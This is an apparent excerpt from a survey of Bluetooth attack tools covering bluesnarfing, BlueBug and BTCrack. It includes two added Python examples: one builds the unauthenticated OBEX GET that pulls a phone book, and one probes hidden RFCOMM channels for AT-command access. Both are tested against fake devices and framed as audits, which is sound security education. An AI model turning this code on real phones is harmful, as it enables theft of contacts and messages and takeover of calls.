
Bluetooth Tools


There are a number of utilities specifically designed to attack Bluetooth technology, and they fall into one of two categories: discovery and exploitation. The tools for discovering Bluetooth devices are akin to Wi-Fi wardriving tools, but they target the Bluetooth protocols themselves (device inquiry and service discovery) rather than 802.11. Examples of discovery tools include Bluescan, Bluesniff, BTBrowser, and BTCrawler.

Bluescan is a GNU/Linux Bash utility that collects information about nearby Bluetooth devices without needing to pair with them. The tool uses scanning methods that never pair with or authenticate to the target, and it records as much as it can learn about every Bluetooth device it discovers.

Bluesniff is a discovery tool written by the Shmoo Group that has a front-end interface and can detect both hidden (non-discoverable) and discoverable Bluetooth devices. It is based on an older utility, Redfang, which found hidden devices by brute force: a device in non-discoverable mode does not answer inquiry scans, but it still answers a direct connection attempt to its device address (BD_ADDR), so Redfang iterated over candidate addresses and tried to connect to each one.

The BTBrowser application is Java-based and allows the attacker to query device information and the supported profiles/service records of the Bluetooth devices it encounters. The utility runs on a mobile phone, which makes it easy to deploy and inconspicuous.

BTCrawler is designed for Windows Mobile devices and performs service queries to determine which Bluetooth devices exist in proximity. The most recent version of BTCrawler also supports bluejacking and bluesnarfing, two attack methods that abuse the Bluetooth communication protocols. Bluejacking pushes an unsolicited message (typically a vCard sent over OBEX) to a nearby device and is a nuisance rather than a theft. Bluesnarfing is a method in which the attacker steals information stored on the target's Bluetooth device (calendar, e-mails, text messages, contacts, etc.) without the target's knowledge. On a number of older phones this required no pairing at all: the OBEX Push service, which is only meant to receive incoming objects, also answered OBEX GET requests for well-known file names such as telecom/pb.vcf (the phone book), so the attacker could pull data without ever authenticating. Later firmware and Bluetooth stack updates closed this hole by requiring pairing before such requests are served.
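To make the bluesnarfing mechanism concrete, the following is an added example (not code from the paper, nor from BTCrawler or any other tool named here) that builds the two OBEX packets a snarfing tool sends over the unauthenticated OBEX Push channel, a CONNECT followed by a GET for telecom/pb.vcf, and parses the reply. No Bluetooth hardware is involved: the two response packets are constructed in-process, one standing in for an old phone that hands over the phone book and one for a patched phone that refuses with Unauthorized. The packet layout follows the OBEX specification (opcode, 16-bit big-endian length, then headers whose top two bits select their encoding); the sample vCard and the choice of 0xC1 as the refusal code are assumptions.

```python
"""OBEX GET of telecom/pb.vcf, the request at the core of bluesnarfing (added example)."""
import struct

# OBEX opcodes (final bit 0x80 set) and response codes
OBEX_CONNECT = 0x80
OBEX_GET_FINAL = 0x83
OBEX_SUCCESS = 0xA0        # 200 OK: the device served the object
OBEX_UNAUTHORIZED = 0xC1   # 401: one plausible refusal from a patched phone (assumed)

# OBEX header identifiers; the top two bits of an HI byte give its encoding
HDR_NAME = 0x01            # 0x00: null-terminated UTF-16BE string, 2-byte length
HDR_TYPE = 0x42            # 0x40: byte sequence, 2-byte length
HDR_BODY = 0x48            # 0x40: byte sequence (partial object)
HDR_END_OF_BODY = 0x49     # 0x40: byte sequence (last chunk of the object)


def _unicode_header(hid, text):
    data = text.encode("utf-16-be") + b"\x00\x00"
    return struct.pack(">BH", hid, 3 + len(data)) + data


def _bytes_header(hid, data):
    return struct.pack(">BH", hid, 3 + len(data)) + data


def _packet(opcode, payload):
    # length counts the opcode and the length field itself
    return struct.pack(">BH", opcode, 3 + len(payload)) + payload


def build_connect(max_packet=0x2000):
    """OBEX CONNECT: version 1.0, no flags, our maximum packet size.
    No Target header is sent, which is how the OBEX Push inbox is addressed."""
    return _packet(OBEX_CONNECT, struct.pack(">BBH", 0x10, 0x00, max_packet))


def build_get(name, mime="text/x-vCard"):
    """OBEX GET (final) for a named object; telecom/pb.vcf is the phone book."""
    headers = _unicode_header(HDR_NAME, name) + _bytes_header(HDR_TYPE, mime.encode() + b"\x00")
    return _packet(OBEX_GET_FINAL, headers)


def parse_response(pkt):
    """Return (response_code, object_bytes), walking headers by their encoding."""
    code, length = struct.unpack(">BH", pkt[:3])
    if length != len(pkt):
        raise ValueError("truncated or padded OBEX packet")
    body, pos = b"", 3
    while pos < length:
        hid = pkt[pos]
        enc = hid & 0xC0
        if enc in (0x00, 0x40):                       # 2-byte length including HI and length
            hlen = struct.unpack(">H", pkt[pos + 1:pos + 3])[0]
            value, pos = pkt[pos + 3:pos + hlen], pos + hlen
        elif enc == 0x80:                             # single byte value
            value, pos = pkt[pos + 1:pos + 2], pos + 2
        else:                                         # 0xC0: four byte value
            value, pos = pkt[pos + 1:pos + 5], pos + 5
        if hid in (HDR_BODY, HDR_END_OF_BODY):
            body += value
    return code, body


def is_snarfable(response):
    """True when the phone answered the unauthenticated GET with the phone book."""
    code, body = parse_response(response)
    return code == OBEX_SUCCESS and body.startswith(b"BEGIN:VCARD")


# Constructed responses standing in for two targets (no real device was queried).
SAMPLE_VCARD = (b"BEGIN:VCARD\r\nVERSION:2.1\r\nN:Doe;Jane\r\n"
                b"TEL;CELL:+15550100\r\nEND:VCARD\r\n")
VULNERABLE_RESPONSE = _packet(OBEX_SUCCESS, _bytes_header(HDR_END_OF_BODY, SAMPLE_VCARD))
PATCHED_RESPONSE = _packet(OBEX_UNAUTHORIZED, b"")

if __name__ == "__main__":
    print("CONNECT:", build_connect().hex())
    print("GET telecom/pb.vcf:", build_get("telecom/pb.vcf").hex())
    for label, resp in (("old phone", VULNERABLE_RESPONSE), ("patched phone", PATCHED_RESPONSE)):
        print(label, "snarfable:", is_snarfable(resp))
```

The two request packets are what a snarfing tool would write to the RFCOMM channel that SDP lists for OBEX Object Push; `is_snarfable` is the check an auditor wants, since a phone that returns 0xA0 with a vCard body to a GET from an unpaired peer is exposed, while one that answers with a 0xC1 (or refuses the connection outright) is not.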

The applications discussed above give a general overview of the utilities that exist to discover Bluetooth targets in one's proximity. Once the attacker has found a target, the next phase is to launch an attack against it. Utilities that serve this purpose include BTCrack, BlueBugger, Bluesnarfer, BlueTest, BTAudit, T-BEAR, Bluediving, and CIHWB. They range from simple scripts to fully featured Bluetooth auditing suites.

The first utility to be discussed is BlueBugger, a program that exploits a known vulnerability called "BlueBug" in the Bluetooth stacks of certain phones. This vulnerability is a progression of the bluesnarfing technique: it gives access to private information stored on the device without requiring the pairing or authentication phase. Bluebugging uses a hidden RFCOMM channel that the device does not advertise through the Service Discovery Protocol (SDP), so a tool that trusts only the SDP records never sees it. That channel accepts AT commands without traditional Bluetooth pairing, so the attacker can read and write contacts and text messages, place calls, and set up call forwarding; in effect, the attacker gains complete control of the phone's telephony functions.
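The audit that follows from this is to probe every RFCOMM channel rather than only the ones SDP advertises, and to flag any channel that answers a bare `AT` with `OK` while being absent from the SDP records. The block below is an added example (it is not code from the paper or from BlueBugger) that implements that probe against a constructed in-process fake phone, so it runs without hardware: the fake advertises channels 1 (Serial Port, which demands pairing) and 3 (OBEX Push, which does not speak AT) and additionally answers AT on the unadvertised channel 17, as a BlueBug-vulnerable handset would. The channel numbers, the `connect` callback shape and the fake's behaviour are all assumptions made for the example.

```python
"""Probing for unadvertised RFCOMM channels that accept AT commands (added example)."""

# RFCOMM server channels are 1..30; SDP normally tells a client which ones to use,
# but nothing stops a client from trying all of them.
RFCOMM_CHANNELS = range(1, 31)


class _FakeSocket:
    """Minimal stand-in for an RFCOMM socket: send/recv/close only."""

    def __init__(self, speaks_at):
        self._speaks_at = speaks_at
        self._last = b""

    def send(self, data):
        self._last = data

    def recv(self, n):
        if self._speaks_at and self._last.strip().upper().startswith(b"AT"):
            return b"\r\nOK\r\n"[:n]
        return b""

    def close(self):
        pass


class FakeBlueBugPhone:
    """Constructed target (assumption): SDP lists channels 1 and 3, but the set in
    `hidden` also accepts AT commands from an unpaired peer, like a BlueBug phone."""

    sdp_channels = {1: "Serial Port", 3: "OBEX Object Push"}

    def __init__(self, hidden=frozenset({17})):
        self._hidden = frozenset(hidden)

    def connect(self, channel):
        if channel == 1:                      # SPP here requires pairing first
            raise PermissionError("authentication required")
        if channel == 3:                      # OBEX Push connects but is not a modem
            return _FakeSocket(speaks_at=False)
        if channel in self._hidden:           # the unadvertised AT channel
            return _FakeSocket(speaks_at=True)
        raise ConnectionRefusedError(f"channel {channel} refused")


def probe_at(connect, channel):
    """Open `channel` via the injected connector, send 'AT', return the raw reply
    (None if the channel cannot be opened at all)."""
    try:
        sock = connect(channel)
    except (ConnectionRefusedError, PermissionError, OSError):
        return None
    try:
        sock.send(b"AT\r")
        return sock.recv(64)
    finally:
        sock.close()


def find_at_channels(connect, channels=RFCOMM_CHANNELS):
    """Every channel that answers a bare AT with OK, regardless of SDP."""
    found = []
    for ch in channels:
        reply = probe_at(connect, ch)
        if reply and b"OK" in reply:
            found.append(ch)
    return found


def hidden_at_channels(connect, sdp_channels, channels=RFCOMM_CHANNELS):
    """Channels that accept AT but are not in the SDP records: the BlueBug signature."""
    return [ch for ch in find_at_channels(connect, channels) if ch not in sdp_channels]


if __name__ == "__main__":
    phone = FakeBlueBugPhone()
    print("AT channels:", find_at_channels(phone.connect))
    print("hidden AT channels:", hidden_at_channels(phone.connect, phone.sdp_channels))
```

To run the same probe against a real device, `connect` would be a function that opens `bluetooth.BluetoothSocket(bluetooth.RFCOMM)` from PyBluez and calls `.connect((bd_addr, channel))` with a short timeout; everything else stays as above. The useful part of the result is the difference between the two lists: a channel that speaks AT and is also in SDP is expected (Serial Port profile), while one that speaks AT and is missing from SDP is exactly what BlueBugger looks for.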

Another utility that takes advantage of the BlueBug vulnerability is Bluediving, a suite of tools for Bluetooth penetration testing. The bluesnarfing technique supported by BTCrawler, the discovery utility discussed above, is also available through the Bluediving framework. In addition, the suite can perform MAC address (BD_ADDR) spoofing, connection resets, and RFCOMM and AT command control of a target. It is similar to T-BEAR, the Transient Bluetooth Environment Auditor. What differentiates T-BEAR from Bluediving is the addition of Bluetooth authentication cracking tools. One such tool is BTCrack, which recovers a device's PIN offline from a captured pairing exchange: with the random values and the authentication responses observed during pairing in hand, the attacker tries candidate PINs until one reproduces the observed responses, and the recovered PIN then yields the link key that protects the session.

BlueTest is a simple application written in Perl whose sole function is to extract data from vulnerable Bluetooth devices. Its functionality is similar to that of the BlueBugger utility and its ability to perform bluesnarfing.
